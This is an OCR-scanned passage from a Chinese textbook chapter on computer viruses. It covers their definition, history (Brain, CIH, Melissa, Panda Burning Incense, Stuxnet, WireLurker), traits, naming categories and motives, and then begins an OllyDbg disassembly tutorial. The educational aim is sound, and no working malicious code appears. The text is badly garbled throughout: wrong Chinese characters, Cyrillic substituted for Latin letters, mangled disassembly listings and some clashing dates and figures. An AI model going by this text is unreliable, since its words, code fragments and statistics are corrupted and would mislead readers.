章节 ， 内 容 较 多 ， 看 上 去 较 难 ， 建 议 读者 勤 做 笔记 ， 跟 看 笔者 一 起 实践 、 分 析 ， 一 定 会 发 
现 病毒 的 魅力 。 
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911 计算 机 病毒 的 定义 


计算 机 病毒 ， 是 指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 毁坏 数据 ， 影 
啊 计 算 机 使 用 ， 并 能 目 我 复制 的 一 组 计算 机 指令 或 者 程序 代码 〈 摘 目 《 中 华人 民 共 和 国 计 
算 机 信息 系统 安全 保护 条 例 》 第 二 十 八条 ) 。 

计算 机 病毒 是 一 个 程序 或 一 段 可 执行 代码 ， 就 像 生物 病 毒 一 样 具有 目 我 驼 殖 、 互 相传 
染 以 及 激活 再 生 等 生物 病毒 特征 。 计 算 机 病毒 有 独特 的 复制 能 力 ， 它 们 能 够 快速 芝 延 ， 叉 
妾 弟 难 以 根除 。 计 算 机 病毒 能 把 目 喘 附 看 在 各 种 类 型 的 文件 上 ， 当 文件 被 复制 或 从 一 个 用 
户 传送 到 夯 一 个 用 户 时 ， 它 们 融 随 同文 件 一 起 蔓延 开 来 。 

实际 上 ， 计 算 机 病毒 就 是 人 类 通过 研究 病毒 仿生 学 ， 作 用 于 计算 机 ， 通 过 计算 机 指令 或 
者 程序 代码 ， 破 坏 计 算 机 系统 从 而 获得 对 病毒 制造 者 来 说 有 件 利 价值 的 信息 的 工具 手段 。 

综 上 所 述 ， 计 算 机 病毒 并 不 神秘 ， 因 为 它 只 是 一 段 计算 机 指令 或 者 程序 代码 ， 也 就 是 
说 只 要 读者 学 过 一 门 计算 机 语言 ， 就 拥有 编写 计算 机 病毒 的 语言 基础 ， 但 是 没有 编号 病毒 
的 能 力 ， 因 为 对 计算 机 病毒 的 逻辑 原理 、 运 行规 则 没有 一 定 的 认 知 。 本 章 将 详细 讲述 计算 
机 病毒 的 原理 、 行 为 以 及 对 计算 机 病毒 的 防范 ， 从 源码 上 探秘 ， 从 行为 上 分 析 计 算 机 病毒 
是 如 何 制造 并 投入 运行 ， 进 而 使 读者 从 中 获得 对 于 病毒 防范 手段 的 局 发 ， 并 激发 读者 对 于 
软件 安全 的 兴趣 与 热情 。 


9.1.2 计算 机 病毒 的 起 源 与 发 展 


谈 及 计算 机 病毒 的 起 源 ， 不 得 不 提 及 享有 伟大 数学 家 、 现 代 计 算 机 创始 人 名 党 的 
АТ Пеи Не (John von Neumann) ， 他 在 1945 年 提交 了 改进 ENIAC (Electronic 
Numerical Integrator And Calculator) 设计 方案 ， 引 入 了 运算 器 、 迎 辑 控制 装置 、 存 储 器 、 
输入 和 输出 设备 的 概念 ， 并 且 于 1949 年 发 表 的 一 篇 学 术 论 文 《 目 我 党 衍 的 目 动 机 理论 》 

(Theory of Self-Reproducing Automata) 中 提出 计算 机 程序 能 够 在 内 存 中 进行 目 我 复制 ， 
这 就 为 计算 机 病毒 的 控制 设备 以 及 在 内 存 中 运行 、 复 制 艳 定 了 坚实 的 理论 基础 。 

在 1960 年 初 ， 贝 尔 实验 室 的 三 个 年 轻 程序 员 用 汇编 语言 玩 起 了 一 个 游戏 ， 也 就 是 著名 
HJ “WAS ХИ” 运用 汇编 语言 编写 的 破坏 对 手 的 程序 ， 表 现 出 了 病毒 的 感染 性 ， 也 体 
现 出 计算 机 病毒 概念 的 秩 形 。 

1977 年 托马斯 。 捷 。 瑞 安 (Thomas.JRyan) 的 科幻 小 说 《P-1 的 春天 》 (The 
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жон 病毒 不 神秘 人 Mh 


Adolescence of P-1) ， 摘 绘 出 病毒 在 计算 机 中 相互 感染 并 最 终 控 制 了 7000 台 计算 机 的 灾难 
情节 ， 并 且 把 这 种 病毒 第 一 次 称 为 “计算 机 病毒 ”。 

1983 年 11 月 3 日 ， 美 国 南 加 州 大 学 的 学 生 弗 雷 德 。 科 恩 (Fred Cohen) ， 后 来 被 誉 为 
“ 计 鼻 机 病毒 之 父 ”， 于 VAX11/750 计 算 机 系统 ， 也 融 是 UNIX 系 统 下 编写 并 运行 了 一 个 
具有 目 我 复制 功能 ， 可 在 计算 机 间 传 染 令 操 作 系 统 死 机 的 程序 。 他 紧 接着 于 一 周 后 义 进行 
了 5 次 实验 ， 得 出 了 计算 机 病毒 确实 存在 的 结论 。 他 的 导师 伦 ， 艾 德 勒 曼 (Len Adleman) 
将 它 命 名 为 计算 机 病毒 。 科 恩 通 过 不 懈 地 研究 与 思考 ， 于 1987 年 发 表 了 一 篇 表 动 世界 的 博 
士 论 文 《计算 机 病毒 》， 该 论文 第 一 次 从 真正 意义 上 提出 了 计算 机 病毒 的 概念 。 

1986 年 ， 巴 基 斯 坦 擅长 软件 编写 的 两 兄弟 为 了 打击 盗版 软件 的 使 用 者 ， 编 写 了 世界 上 
最 早 在 个 人 计算 机 上 广泛 传播 的 病毒 巴基斯坦 病毒 (C-Brain) ， 也 是 世界 上 第 一 例 
具有 真正 意义 的 计算 机 病毒 。 该 病毒 运行 于 DOS 系 统 下 ， 功 能 是 当 用 户 非法 拷贝 软件 时 ， 
“ 吃 掉 ”用 户 人 硬盘 的 剩余 空间 。 

1987 人 至 1989 年 ， 针 对 DOS 系 统 的 病毒 (黑色 星期 五 、IBM 圣 诞 树 等 ) 在 世界 范围 内 
流行 ， 我 国 也 出 现 了 能 够 感染 人 硬盘 和 软盘 引导 区 的 stoned 病 毒 ， 该 病毒 体 代码 中 有 明显 的 标 
志 一 一 Your РС is now Stoned! LEGALISE MARIJUANA! ， 该 病毒 也 称 为 “大 麻 病 毒 ”。 

20 世 纪 90 年 代 ， 随 着 Windows 系 统 的 普及 ，Windows 系 统 下 的 病毒 也 是 愈 来 愈 多 ， 其 
中 著名 的 有 1996 年 的 宏 病毒 和 1998 年 的 CIH 病 毒 。 

宏 病 毒 主要 感染 对 象 为 微软 公司 的 Office 办 公 软 件 ， 如 Word、Excel 等 ， 一 旦 打开 感染 
了 宏 病 毒 的 文档 ， 其 中 具有 病毒 感染 效应 的 宏 就 会 被 执行 ， 宏 病毒 就 会 转移 到 计算 机 中 ， 
寄生 在 Normal 模 板 上 ， 并 且 会 带 有 恶意 地 阻止 用 户 正 常 使 用 Office 软 件 ， 该 病毒 主要 借助 
存在 于 Internet 上 的 文档 进行 传播 。 

CIH 病 毒 的 危害 更 加 巨大 ， 它 对 于 Windows 95/98 系 统 拥 有 毁灭 性 的 破坏 力 。CIH 病 毒 
针对 Win32 系 统 ， 感 染 EXE 文 件 ， 属 于 文件 型 病毒 ， 于 每 年 的 4 月 26 日 (CIH V1.2). 6H 
26H (CIH V1.3) 、 每 月 的 26 日 (СН V1.4) 运行 发 作 ， 它 将 破坏 硬盘 数据 ， 同 时 会 对 某 
些 主板 上 的 Flash Rom 中 的 BIOS 进 行 破坏 ， 使 物理 人 硬盘 损坏 或 主板 损坏 ， 最 终 导 致 计算 机 
无 法 正常 启动 ， 运 行 。 

就 在 1998 年 克 ，Happy99 网 络 蠕虫 病毒 一 一 完全 通过 Interet 传 播 的 病毒 诞生 。 该 病毒 
通过 邮件 传播 ， 病 毒 运行 后 ， 屏 幕 上 出 现 绚 丽 烟花 效果 ， 并 显示 Happy New Year 1999!! НУ 
标题 ， 以 庆祝 1999 年 的 到 来 ， 并 于 后 台 悄 悄 运 行 ， 干 扰 邮 件 的 正常 收发 。 

随后 在 1999 年 3 月 ， 梅 丽 莎 病毒 (Melissa， 创 作 于 1998 年 春天 ， 最 早 可 以 通过 邮件 传 
播 的 病毒 ) 爆发 ， 这 是 世界 上 第 一 例 以 邮件 方式 进行 传播 的 病毒 。 邮 件 收 件 人 会 收 到 标 
题 主要 为 Important Message From ххх 〈xxx 为 用 户 名 ) , 2) Неге 15 Ша document you 
asked Гог... don't show anyone else; -) 的 邮件 ,一旦 收 件 人 打开 邮件 ， 潜 伏 在 文档 中 的 
宏 病 毒 梅 丽 莎 就 会 发 作 ， 自 动向 用 户 通讯 录 的 前 50 位 好 友 复 制 发 送 携带 病毒 文档 的 
邮件 。 

2000 年 2 月 ， 一 种 名 为 分 布 式 拒绝 服务 攻击 (DDOS) 的 攻击 方式 大 规模 爆发 ， 先 后 
使 Yahoo、 亚 马 还 、CNN 等 网 站 朋 演 瘫痪 。 同 年 名 为 “ 爱 虫 ” (Love letter) 的 由 VBS 脚 本 
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语言 编写 的 病毒 通过 邮件 大 肆 传 播 ， 病 毒 以 邮件 传播 的 方式 又 达到 一 个 新 的 高 度 。 相 比 于 
梅 丽 莎 病毒 而 言 ， 其 破坏 性 更 大 ， 该 病毒 在 利用 微软 的 Outlook 软 件 传 播 病毒 的 同时 ， 还 
可 以 利用 ActiveX 控 件 对 计算 机 用 户 的 本 地 人 硬盘 文件 进行 读 写 操作 。 

2001 年 ， 蠕 虫 “ 红 色 代 码 ” 与 “ 尼 达 姆 ”相继 爆发 ， 前 者 被 称 为 最 帅 贵 的 病毒 之 一 ， 
因 其 利用 微软 Microsoft IIS Web 服 务 器 的 漏洞 (0day) 对 计算 机 进行 攻击 ， 并 且 取 得 计算 
机 的 最 高 权限 。 尼 达 姆 病毒 不 仅 利用 漏洞 还 主要 以 邮件 形式 进行 传播 ， 入 侵 了 约 830 万 台 
计算 机 ， 造 成 经 济 损失 高 达 5.3 亿 美元 ， 给 缺乏 邮件 信息 安全 意识 的 计算 机 用 户 们 上 了 生 
动 的 一 课 ， 网 络 蠕虫 引发 的 安全 问题 自 此 得 到 了 人 们 的 重视 。 同 时 ， 国 内 知名 远程 控制 软 
件 “ 灰 饮 子 ”被 制作 了 出 来 ， 谁 也 没有 想到 ， 原 本 用 于 家 庭 公司 的 正常 监控 软件 会 在 4 年 
后 成 为 卷 席 中 国 互联 网 安全 界 的 罪魁 祸首 。 

2003 年 ， 冲 击 波 病 毒 (Blaster) 席卷 全 球 ， 它 利用 RPC 漏 洞 攻 击 TCP135 号 端口 ， 获 得 
操作 系统 的 最 高 权限 ， 进 而 控制 笨 主 机 ， 对 其 隐私 进行 非法 窃取 。 据 计算 机 系统 安全 及 服 
АНГ], (Symantec) 安全 反应 感应 器 网 络 的 样本 显示 ， 全 球 至 少 有 12.4 万 台 使 用 
微软 窗口 软件 的 计算 机 遭受 感染 。 计 算 机 防毒 软件 厂商 “趋势 科技 ” (TrendMicro) 的 专 
家 说 ，“ 冲 击 波 ” 病 毒 可 能 感染 了 全 球 一 两 亿 台 计算 机 。 

2004 年 ， 同 样 是 利用 漏洞 进行 攻击 传播 的 震荡 波 〈Sasser) 病毒 肆虐 互联 网 ， 利 用 
Lsass 漏 洞 进行 传播 ， 开 启 中 招 用 户 计算 机 的 128 个 线程 去 攻击 其 他 计算 机 用 户 ， 同 样 造成 
了 巨大 的 经 济 损失 。 也 是 在 这 一 年 内 ， 第 一 例 基于 手机 塞 班 系统 的 蠕虫 病毒 面世 ， 这 就 是 
Cabir 蠕 虫 病毒 ， 这 种 病毒 攻击 对 象 为 诺基亚 S60 系列 、Symbian 操作 系统 的 手机 ， 并 且 利 
用 蓝牙 漏洞 进行 传播 ， 自 此 手机 病毒 也 走 进 人们 的 视野 。 

2005 年 ， 各 类 病毒 层出不穷 。 据 金山 反 病 毒 监 测 中心 数 据 显 示 ， 从 2005 年 1 月 到 10 
月 ， 一 共 截 获 或 监测 到 的 病毒 达到 50 179 个 ， 其 中 木马 、 蠕 虫 、 黑 客 病毒 占 其 中 的 91%， 
以 盗 取 用 户 有 价 账 号 〈 如 网 银 、QQ、 网 游 ) 的 木马 病毒 为 主 ， 多 达 2000 多 种 ， 如 果 算 上 
变种 则 就 要 超过 一 万 种 ， 平 均 每 天 有 30 个 病毒 出 现 。 远 程控 制 软 件 “ 灰 鸟 子 ” (Win32. 
Hack.Huigezi) 被 各 大 杀毒 软件 列 为 年 度 十 大 病毒 之 一 ，“ 灰 鸽子 ”名 声 大 品 。 庞 大 的 数 
据 也 明确 地 表明 计算 机 病毒 进入 了 一 个 快速 增长 的 爆发 期 。 

2006 年 11 月 ， 感 染 能 力 与 破坏 能 力 极 强 的 “熊猫 烧香 ”病毒 深 深 地 印 入 了 每 一 位 计算 
机 用 户 的 心中 。 熊 猫 烧香 本 质 是 一 个 经 过 多 次 变种 的 蠕虫 病毒 ， 感 染 能 力 极 强 ， 用 户 系统 
正常 的 文件 几乎 都 会 遭 到 病毒 感染 ， 而 用 户 系 统 中 所 有 .exe 可 执行 文件 的 图 标 都 会 被 算 改 
成 举 着 三 根 香 的 大 熊猫， 这 也 是 熊猫 烧香 病毒 名 称 的 来 源 。 它 也 会 通过 网 站 /局 域 网 来 传 
播 ， 因 此 熊猫 烧香 病毒 的 传播 速度 极 快 ， 在 短 短 几 个 小 时 内 就 有 几 王 台 计 算 机 感染 该 病 
毒 。 虽 然 它 经 过 多 次 变种 ， 但 熊猫 烧香 病毒 的 破坏 能 力也 不 可 忽视 ， 计 算 机 用 户 的 信息 会 
遭 到 窃取 ， 硬 盘 数 据 也 会 遭受 到 破坏 ， 病 毒 会 删除 拓展 名 gho 的 文件 ， 使 得 ghost 软件 无 法 
恢复 操作 系统 ， 同 样 还 会 杀 掉 各 类 杀毒 软件 的 进程 与 线程 ， 致 使 杀毒 软件 无 效 ， 可 谓 危 害 
极 大 。2012 年 1 月 ， 伴 随 着 新 年 的 来 临 ， 能 猎人 烧香 的 变种 病毒 金 猪 报喜 现 喘 于 互联 网 ， 它 
和 熊猫 烧香 病毒 不 同 的 是 ， 金 猪 报喜 病毒 将 文件 图 标 变 成 “ 金 猪 报喜 ”， 借 春节 来 临 人 们 
相互 祝贺 的 时 机 大 肆 传 播 。 由 于 其 具有 熊猫 烧香 的 本 质 ， 故 熊猫 烧香 病毒 专 杀 工 具 就 可 以 
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清除 该 病毒 的 威胁 ， 因 此 没有 造成 巨大 经 济 损失 。 

2007 年 ， 据 瑞星 反 病 毒 监 测 网 数据 统计 ， 珊 星 公 司 共 截获 新 病毒 样本 917 839 个 ， 比 
去 年 增加 了 70.7%。 其 中 木马 病毒 580 992 个 ， 后 门 病毒 194 581 个 ， 两 者 之 和 超过 77 万 
个 ， 占 总 体 病 毒 的 84.$%。 其 中 利用 U 盘 等 移动 存储 设备 进行 传播 的 病毒 泛滥 ， 以 帕 虫 
(AV 终 结 者 ，AV is anti-virus) 病毒 、 大 小 姐 病毒 为 代表 ， 这 些 病毒 的 主要 目的 是 入 侵 系 
统 ， 破 坏 杀 毒 软件 正常 运行 与 盗 取 网 游 、 网 银 等 账号 ， 从 中 牟取 非法 利益 。 

2008 年 ， 病 毒 传 播 方 式 的 重点 从 移动 存储 设备 转移 到 了 “网 页 挂 马 ” 的 形式 ， 用 户 
通过 浏览 被 上 传 了 病毒 的 网 页 ， 或 者 下 载 了 含有 病毒 的 文件 从 而 感染 病毒 ， 因 广大 计算 机 
用 户 缺 乏 网 络 安 全 的 防范 意识 ， 以 及 杀毒 软件 对 于 含有 病毒 网 页 的 检查 程度 不 够 而 导致 用 
户 中 招 的 比例 大 大 增加 。 这 也 正 警 告 着 维护 网 页 平台 的 安全 人 员 应 及 时 地 填补 网 页 中 的 漏 
洞 ， 计 算 机 用 户 对 于 网 络 安 全 的 认识 也 吸 待 提高 。 

2009 年 ，“ 网 页 挂 马 ”与 钓鱼 网 站 激增 ， 这 种 成 本 低 、 收 入 颇 高 的 黑色 产业 链 日 渐 
成 型 ， 其 中 钓鱼 网 站 主要 以 各 大 网 络 公司 活 动 为 诈骗 诱饵 ， 如 腾讯 QB 充值 、 网 易 点 卡 充 
值 ， 以 及 以 福利 彩票 、 电 视 节 目 中 奖 信息 等 ， 吸 引用 户 填写 个 人 账户 等 信息 ， 从 而 骗取 用 
户 的 合法 财产 。 随 着 网 络 游 戏 产业 的 日 益 兴 旺 ， 基 于 网 络 游戏 制作 的 外 挂 软件 也 纷纷 投入 
市 场 ， 这 些 软 件 往往 捆绑 着 木马 病毒 ， 在 用 户 运 行 外 挂 软件 非法 盘 利 的 同时 ， 用 户 本 身 的 
利益 也 受到 了 木马 编写 者 的 侵害 ， 可 谓 是 星 螂 捕 蝉 黄 汰 在 后 。 第 一 例 基 于 手机 系统 的 木马 
病毒 (间谍 软件 ，Mobile өру) 已 经 渗透 到 世界 各 地 手机 用 户 的 手机 中 ， 相 比 形 形 色色 的 
计算 机 病毒 而 言 ，Mobile spy 无 疑 是 更 加 可 怕 ， 首 先 该 软件 在 当时 几乎 可 以 寄生 、 隐 藏 在 
任意 一 部 手机 中 ， 其 次 就 是 它 强大 的 功能 一 一 拍照 、 录 像 、 录 音 、 定 位 、 短 信和 监控 等 。 由 
于 手机 安全 领域 的 空白 ， 使 得 由 此 间谍 软件 带 来 的 损失 无 法 估计 ， 这 也 警示 着 开拓 手机 安 
全 领域 、 研 制 保护 手机 的 安全 软件 的 任务 刻不容缓 ! 

2010 年 ， 用 户 感染 计算 机 病毒 的 比例 为 60%， 相 比 前 一 年 的 70.51% 有 所 下 降 ， 形 成 
下 降 趋势 的 局 面 ， 一 方面 得 益 于 反 病 毒 技 术 的 逐步 完善 ， 男 一 方面 得 益 于 对 计算 机 用 户 
防治 病毒 知识 的 普及 。 而 病毒 的 攻击 针对 的 目标 也 转移 至 网 银 、 网 购 等 用 户 ， 实 行 专用 
户 针对 性 攻击 。 然 而 Web 网 站 安全 形势 依旧 严峻 ， 新 的 0day 不 断 被 挖掘 出 ， 网 站 维护 人 员 
修补 漏洞 不 及 时 ， 使 得 很 多 网 站 依旧 能 被 轻而易举 地 入 侵 、 挂 马 ， 当 用 户 访问 页 面 的 时 
候 ， 病 毒 会 利用 用 户 系 统 内 的 漏洞 完成 入 侵 。 一 种 新 的 攻击 模式 APT 攻 击 借 “ 震 网 病毒 ” 
(Stuxnet) 震惊 全 球 ，APT (Advanced Persistent Threat) ， 即 长 时 间 可 间断 攻击 ， 具 有 强 
烈 的 针对 性 ， 通 常 带 有 浓烈 的 政治 、 利 益 色彩 。“ 震 网 病毒 ”由 美国 及 以 色 列 情报 部 门 
开发 ， 针 对 全 球 各 大 能 源 工 进行 攻击 的 病毒 ， 该 病毒 也 可 以 说 是 信息 化 战场 第 一 例 投入 应 
用 的 病毒 ， 其 中 伊 妆 受 其 影响 最 为 严重 。 在 一 次 攻击 中 ， 伊 明 的 纳 坦 效 铀 浓缩 基地 至 少 有 
1 的 离心 机 因 感 染 该 病毒 而 被 迫 关 闭 。 

果不其然 ， 由 于 Web 安 全 并 没有 得 到 足够 的 重视 ， 在 接 下 来 的 两 年 内 网 购 木马 出 现 了 
爆发 式 的 增长 。 网 购 木 马 在 后 台 悄 悄 运 行 并 且 监 控 计算 机 用 户 ， 当 计算 机 用 户 通 过 网 购 平 
台 交 易 时 ， 木 马 进 行 交易 劫持 ， 也 就 是 当前 的 交易 页 面 会 偷偷 被 病毒 跳 转 到 指定 网 址 或 者 
修改 后 台 账 户 指 癌 黑客 账户 ， 当 然 先 前 的 交易 也 就 神 不 知 鬼 不 觉 地 被 取消 了 ， 其 中 “ 文 
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付 大 盗 ”“ 浮 云 ” 与 “刺客 ”最 有 代表 性 。2012 年 的 “ 毒 王 ”依旧 是 基于 Windows 操 作 系 统 
平台 的 “ 鬼 影 ”系列 病毒 ，“ 鬼 影 ” 具 有 的 “小 强 ” 特 性 使 它 位 列 榜首 。“ 鬼 影 ” 有 极 强 
的 生存 能 力 ， 它 能 捆绑 下 载 AV 终 结 者 等 针对 杀毒 软件 的 病毒 程序 ， 并 且 将 主 代码 寄存 在 
MBR (人 硬盘 主 引 导 记 录 ) 中 。 这 样 ， 就 算是 重 装 了 系统 ， 病 毒 依然 会 运行 生效 。 同 样 ， 
由 于 安 早 系统 开源 的 特性 ， 安 旱 病 毒 有 成 指数 函数 增长 的 趋势 ， 恶 意 扣 费 和 信息 泄露 是 
病毒 主要 的 两 大 功能 ， 并 且 于 2012 年 出 现 寄 生 于 微 信 等 平台 的 僵尸 程序 (手机 僵尸 病 
毒 ， 通 过 向 其 他 人 目 动 发 送 含 有 病毒 链接 的 短信 、 消 奶 进 行 传播 ) ， 手 机 安全 形势 不 容 
乐观 。 

从 2013 到 2015 年 ， 病 毒 的 主要 进攻 方 癌 已 经 明朗， 第 一 是 移动 终端 ， 第 二 则 是 网 络 
支付 服务 。 目 前 在 移动 终端 中 ， 由 于 安里 系统 的 开源 性 以 及 大 部 分 APP 没 有 进行 严格 地 审 
核 ， 导 致 病毒 大 肆 发 展 与 传播 ， 并 且 随 着 二 维 码 、 微 信 支 付 等 方式 的 产生 ， 利 用 扫 码 、 支 
付 等 漏洞 的 病毒 正 源源 不 断 地 被 开发 出 来 。 同 样 ，iOS 用 户 也 绝 不 能 掉以轻心 ， 虽 然 APP 
在 App Store 中 需要 经 过 严格 审核 ， 但 是 2014 年 11 月 ， 一 个 名 为 WireLurker 的 病毒 感染 了 约 
35 万 的 中 国人 苹果 用 户 。 该 病毒 通过 寄生 在 第 三 方 软件 商店 “麦芽 地 ”中 ， 当 用 户 在 Mac/ 
PC 平台 使 用 “麦芽 地 ”通过 USB 连 接 1O0S 设 备 下 载 盗版 软件 时 ， 病 毒 就 会 顺 着 这 条 数据 
线 ， 从 计算 机 入 侵 到 移动 设备 中 ， 并 且 目 动 下 载 恶 意 软 件 ， 无 论 是 否 越狱 。 当 然 ， 广 大 
10S 用 户 不 必 因 此 害怕 ， 但 却 要 因此 而 警惕 起 来 ， 不 要 贪图 便宜 而 去 下 载 危 险 未 知 的 第 三 
方 盗版 软件 ， 也 不 要 去 轻易 越狱 ,病毒 总 是 潜藏 在 未 知 中 。 不 容 置 疑 ， 在 网 络 交 易 平 台所 
带 来 有 巨大 利益 的 这 块 大 和 蛋糕 的 趋势 下 ， 被 金钱 蒙 项 了 双眼 的 黑客 也 许 正 酝酿 着 给 予 互 联 
网 交易 一 个 巨大 的 冲击 。 毫 无 疑问 ， 未 来 物 联网 将 成 为 新 时 代 的 主流 科技 ， 而 伴随 着 物 联 
网 的 逐渐 发 展 ， 黑 客 隐患 更 加 不 能 被 忽视 ， 也 许 在 将 来 的 物 联 网 时 代 ， 科 幻 游戏 《看 门 
狗 》 中 的 病毒 程序 就 会 成 为 现实 。 


913 ”计算 机 病毒 的 特点 、 分 类 与 目的 


1. 计算 机 病毒 的 特点 


通过 上 面 一 节 计算 机 病毒 的 发 展 史 ， 我 们 可 以 从 中 总 结 出 计算 机 病毒 的 特性 。 

(1) 传染 性 

计算 机 病毒 就 如 同 生 物 病毒 一 般 ， 既 可 以 在 计算 机 系统 内 进行 文件 之 间 的 传染 ， 又 可 
以 在 计算 机 与 计算 机 之 间 传 染 。 传 染 的 媒介 可 以 是 物理 硬件 ， 如 U 盘 、 移 动 硬盘 等 移动 存 
储 设 备 ， 也 可 以 是 通过 虚拟 网 络 传输 文件 、 邮 件 等 方式 进行 传染 。 

(2) 破坏 性 

通常 来 说 ， 计 算 机 病毒 几乎 都 带 有 一 定 的 对 计算 机 系统 、 程 序 、 硬 件 的 破坏 能 力 。 破 
坏 能 力主 要 体现 在 算 改 目标 文件 、 破 坏 系统 程序 、 盗 取 账 号 密码 等 方面 。 病 毒 的 威胁 能 力 
并 不 取决 于 病毒 的 破坏 性 ， 而 是 决定 于 病毒 的 隐蔽 性 。 
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(3) 隐蔽 性 

病毒 的 隐蔽 性 是 决定 其 能 和 否 长 久 存活 并 且 发 挥 作 用 的 决定 性 因素 。 病 毒 的 隐蔽 性 体现 
Е: 中 对 于 计算 机 用 户 而 言 ， 病 毒 能 够 神 不 知 鬼 不 觉 地 在 后 台 悄 悄 运 行 ， 并 且 一 般 不 会 做 
出 影响 计算 机 正常 运行 的 行为 ， 能 够 很 好 地 隐藏 而 不 被 计算 机 用 户 发 现 ; @ 对 计算 机 杀毒 
软件 而 言 ， 病 毒 通过 加 壳 免 杀 等 方式 绕 过 杀毒 软件 的 主动 防御 以 及 手动 查 杀 。 一 旦 病毒 做 
到 了 这 两 点 ， 那 么 这 个 病毒 的 隐蔽 性 就 是 极 好 的 ， 同 时 威胁 性 也 是 极 大 的 。 

(4) 潜伏 性 

病毒 的 潜伏 性 则 是 指 当 病毒 寄生 在 宿主 机 内 并 不 会 立刻 发 作 ， 而 是 当 通 过 用 户 或 应 用 
程序 触发 某 种 特定 的 条 件 时 ， 病 毒 才 会 运行 。 

(5) 潜在 性 

计算 机 病毒 会 随 着 科技 的 发 展 而 发 展 ， 伴 随 着 新 兴 应 用 的 产生 而 产生 ， 因 此 计算 机 病 
毒 对 于 任何 一 个 科技 、 应 用 来 说 ， 都 会 有 潜在 的 风险 ， 只 要 有 黑客 想 要 获得 某 种 利益 ， 那 
么 具有 针对 性 的 病毒 便 会 被 研发 出 来 ， 所 以 病毒 具有 潜在 性 。 


2 计算 机 病毒 的 常见 类 型 


目前 第 见 的 计算 机 病毒 主要 有 以 下 几 种 类 型 。 
> Ми ИНН PE 名 称 ， 称 作 Windows 系 统 病 毒 ， 以 感染 .exe 和 .dll 文 件 


也 就 是 常见 的 木马 病毒 ， 通 种 会 盗 取 用 户 的 个 人 信息 

条 组 中 带 有 Hack， 黑 客 病 毒 ， 功 能 以 远程 控制 为 主 。 

条 组 中 带 有 Marco， 宏 病毒 ， 感 染 OfBce 文 件 。 
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中 带 有 Harm， 破 坏 病毒 ， 对 计算 机 系统 及 文件 进行 破坏 ， 如 格式 化 硬盘 。 

中 带 有 joke， 玩 笑 病 毒 ， 主 要 以 恶搞 为 主 。 

”前 组 中 带 有 Binder， 捆 绑 病 毒 ， 捆 绑 在 其 他 正常 文件 上 ， 比 如 捆绑 QQ.exe, 则 为 
BinderQQ.exe。 


. 计算 机 病毒 的 目的 


展示 技术 能 力 ， 如 熊猫 烧 香 ，“Xxx 神 器 ”。 
出 于 利益 目的 ， 如 APT 攻 击 ， 木 蕊 病毒 。 
用 于 军事 ， 如 1999 年 科索沃 战争 ， 南 联盟 使 用 包括 计算 机 病毒 等 手段 实施 网 络 攻 
击 北约 军事 情报 网 络 ， 在 一 定 程度 上 延缓 了 美国 和 北约 其 他 国家 对 南 联盟 的 空袭 
进程 。 

了 解 了 计算 机 病毒 的 发 展 起 源 与 分 类 ， 那 么 到 底 什 么 是 计算 机 病毒 ? 接 下 来 通过 实例 
分 析 ， 来 深入 了 解 病毒 的 原理 。 


v у со 
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92 ”常用 工具 及 病毒 分 析 


9.2.1 OD 进 阶 


在 上 一 章 介绍 逆 癌 技术 时 ， 讲 述 了 OD 的 基本 使 用 方法 以 及 在 软件 漏洞 分 析 中 的 作 
用 。 接 下 来 的 一 节 中 ， 将 会 使 用 OD 对 “ 敲 竹 杠 ”病毒 进行 详细 分 析 ， 并 且 将 在 分 析 的 同 
时 教会 大 家 如 何 去 更 多 地 了 解 OD， 明 白 如 何 去 合 理 、 高 效 地 使 用 与 分 析 。 
首先 来 看 一 小 段 代码 : 


#include "stdafx.h" 

int main(int argc, char* агду[]) { 
printf ("Hello,world!\n"); 

return 0; 


} 


上 述 代码 中 只 执行 了 两 条 命令 : printft、retum， 用 于 实现 打印 输出 和 返回 。 
下 面 逐 条 解释 反 汇 编 代 码 的 各 个 命令 。 
首先 载 入 OD。 图 9-1 显 示 了 各 个 界面 窗口 。 


ва «ка 


гах 00000000 
ECX 09122280 
EDX 7692ЕЩЕН ntdll.KiFast$S 


“ТҮТТҮ push овловеве 
. 68 98264000 push 00402688 ЗЕ 处 理 程序 安装 
. 68:01 0000001 nou eax, dword ptr fs:[0] 


. 50 push eax 

. 68:8925 0000! поч дмогй ptr #5:[@], esp 

„ BIEC 10 sub esp, 10 反 汇 编 窗 口 
. 52 push ebx 

21. 56 push esi 


ЕРІ 7C930208 ntd11.7C9302 
EIP 00581041 дг. 2А 0 
СО ES В D(FFFFFFB 


1 

0 

1 DS 
@ FS 9038 324) 7FFDF000 
u 


P 
ñ 
2 
$ 
| 05 0000 NULL 


769302 08 пЕ011.7С93 0208 


"ил 

0012FFCC|_ ҒҒҒҒҒҒҒҒ 

00127700] 7ЕГОВ Ф00 <> 
0012704) 80545870 

00127708 0012FFC8 

0012FF0C| 81048020 

90127 РЕФ] FFFFFFFF | SEM БЕ 栈 窗 口 
ФО12Е РЕЖ 7сязеаст ЗЕ г T 


9-1 OD 界面 窗口 
在 每 个 窗口 右 击 可 得 到 对 应 窗口 的 沫 单 。 
在 一 个 程序 被 载 入 OD 进 行动 态 反 汇编 的 时 候 ， 首 要 的 一 点 就 是 找到 入 口 点 ， 不 同 IDE 
编译 出 的 程序 的 入 口 点 会 有 所 不 同 ， 这 个 就 需要 读者 目 己 观察 ， 或 者 百度 搜索 一 下 入 口 点 
特征 。 
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VC 6.0 编 译 出 的 程序 ， 入 口 点 是 三 个 压 栈 指令 push， 这 个 虽然 在 int main(int argc, char* 
argv[]) 定义 的 时 候 没 有 写 ， 但 是 执行 的 时 候 默 认 还 是 传递 3 个 参数 ， 如 图 9-2 所 示 。 


. 50 

- ҒҒЗ5 2099400 
. ҒҒЗ5 1099500 
- E8 9BFFFFFF 


004 01 ӨЕЗ 
00401 8ЕЦ 
00101 GEA 
00401 ВЕ 0 


push eax 

push dword ptr [409920] 
push dword ptr [40991C] 
call 00401000 


9-2 тат Ло 
实际 在 这 三 条 指令 之 前 执行 了 很 多 指令 ， 其 作用 是 初始 化 可 执行 文件 的 空间 ， 并 激 
活 主线 程 ， 这 在 前 面 章节 有 详细 介绍 。 接 下 来 会 执行 获取 命令 行 的 API 以 便 获 取 命 令 行 信 
D, KEDZE, MERER, ANBEAN А CA WHAE 
这 里 说 一 人 Call 指令， 熟悉 VB 的 读者 可 能 会 知道 Call 指 令 ， 比 如 下 面 一 个 简短 的 TestO 
子 函 数 。 


Private Sub Form Load () 
Call Test 

End Sub 

Sub Тезт () 

MsgBox "我 是 测试 " 

Епа Sub 


